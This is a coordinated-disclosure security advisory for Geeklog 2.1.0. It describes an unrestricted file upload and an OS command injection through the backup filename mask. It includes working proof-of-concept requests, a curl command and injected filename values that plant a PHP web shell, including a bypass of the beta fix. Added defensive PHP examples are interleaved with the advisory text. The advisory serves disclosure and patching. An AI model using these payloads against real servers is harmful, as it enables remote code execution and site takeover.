Geeklog 2.1.0 Command Injection

2015.12.11
Credit: Tim Coen
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Geeklog 2.1.0
Fixed in: 2.1.1b3
Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact: geeklog-security@lists.geeklog.net
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type. The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3.

3. Upload of Files with Dangerous Type

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files. To upload files, an attacker needs a registered user that is in the group "Filemanager Admin".
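One way an upload connector can enforce the type check on the server instead of in the browser, added here as an example and not Geeklog's filemanager code; the function names and the allowed-type table are assumptions:

```php
<?php
// Added example, not Geeklog's filemanager code. Function names and the
// allowlist below are assumptions chosen for illustration.

// Extensions the upload endpoint accepts, mapped to the MIME type the
// file contents must actually have.
const ALLOWED_IMAGE_TYPES = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];

// Returns null when the upload is acceptable, otherwise the reason it was
// rejected. The client-supplied filename and Content-Type header are never
// trusted on their own: the extension must be allowlisted, and the bytes on
// disk must carry a matching signature, so "shell.php" sent as image/png
// fails on the extension and PHP source renamed to .png fails on content.
function check_image_upload(string $clientName, string $tmpPath): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        return "extension '$ext' is not allowed";
    }
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected !== ALLOWED_IMAGE_TYPES[$ext]) {
        return "content looks like $detected, not " . ALLOWED_IMAGE_TYPES[$ext];
    }
    return null;
}

// The stored name is generated server-side, so the client never chooses the
// path or smuggles a second extension; only the validated extension is reused.
function stored_name(string $clientName): string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed samples: a PHP file and a file with a minimal PNG signature.
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'constructed sample';");
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16));

var_dump(check_image_upload('shell.php', $php));  // rejected: extension not allowed
var_dump(check_image_upload('shell.png', $php));  // rejected: content is text/x-php
var_dump(check_image_upload('test.png', $png));   // NULL: accepted
echo stored_name('test.png'), "\n";
unlink($php);
unlink($png);
```

The content check relies on the fileinfo extension (libmagic), which is enabled in default PHP builds.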
Proof of Concept

POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773
Cookie: [cookies]

-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="mode"

add
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"

/var/www/geeklog-2.1.0/public_html/images/
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="filepath"

test.png
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png

<?php passthru($_GET['x'])
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="upload"

Upload
-----------------------------10717364298700964751730232773--

As curl command:

curl -i -s -k -X 'POST' \
    -H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \
    -b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \
    --data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \
    'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'

4. OS Command Injection

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When performing a database backup, various settings are passed unsanitized to exec, leading to code execution. To exploit this issue, an attacker needs a registered user that is in the group "Root".

Proof of Concept

1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:

   geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"

2. Perform database backup here: http://localhost/geeklog-2.1.0/public_html/admin/database.php

The injected commands will be executed.

In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command injection is still possible, including the creation of a PHP shell by appending the injected PHP code to an existing PHP file without closing tags:

   geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"

Code

/admin/database.php

    function dobackup()
    {
        [...]
        if (!empty($_CONF['mysqldump_filename_mask'])) {
            $filename_mask = strftime($_CONF['mysqldump_filename_mask']);
        }
        [...]
        $backupfile = $_CONF['backup_path'] . $filename_mask;
        [...]
        $command .= " $_DB_name > \"$backupfile\"";
        [...]
        if ($canExec) {
            exec($command);

5. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:
https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html

--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
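A hardened version of the filename handling shown in the dobackup() excerpt of section 4, added here as an example of the defensive pattern rather than Geeklog's actual fix; the function names, the leading mysqldump binary and the allowlist pattern are assumptions:

```php
<?php
// Added example, not Geeklog's own fix. Function names and the allowlist are
// assumptions; the strftime() expansion mirrors the excerpt from dobackup().

// The mask is configuration, but it is written through a web form, so it is
// untrusted input. Allow only strftime specifiers and plain filename
// characters: the quotes, ';', '>' and spaces the advisory's payload relies
// on never pass this check.
function validate_backup_mask(string $mask): bool
{
    return preg_match('/^[A-Za-z0-9._%-]{1,128}$/', $mask) === 1;
}

// Builds the dump command with every dynamic value wrapped by
// escapeshellarg(), so the shell receives each one as a single argument even
// if the allowlist were ever bypassed (defence in depth, not an alternative).
function build_backup_command(string $dbName, string $backupPath, string $mask, int $now): string
{
    if (!validate_backup_mask($mask)) {
        throw new InvalidArgumentException('backup filename mask contains disallowed characters');
    }
    // Expand the mask only after it passed validation. strftime() is
    // deprecated since PHP 8.1; it is kept here to match the original code.
    $filename = @strftime($mask, $now);
    $backupfile = rtrim($backupPath, '/') . '/' . basename($filename);

    return 'mysqldump ' . escapeshellarg($dbName) . ' > ' . escapeshellarg($backupfile);
}

// Constructed inputs: a benign mask and one shaped like the advisory's payload.
$good = 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql';
$bad  = 'geeklog_db_backup_%Y.sql"; id; "';

echo build_backup_command('geeklog', '/var/backups/', $good, 0), "\n";
try {
    build_backup_command('geeklog', '/var/backups/', $bad, 0);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Because exec() still runs the string through a shell (the redirection needs one), quoting every interpolated value is what keeps a bypassed allowlist from becoming a second command.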

References:

https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html

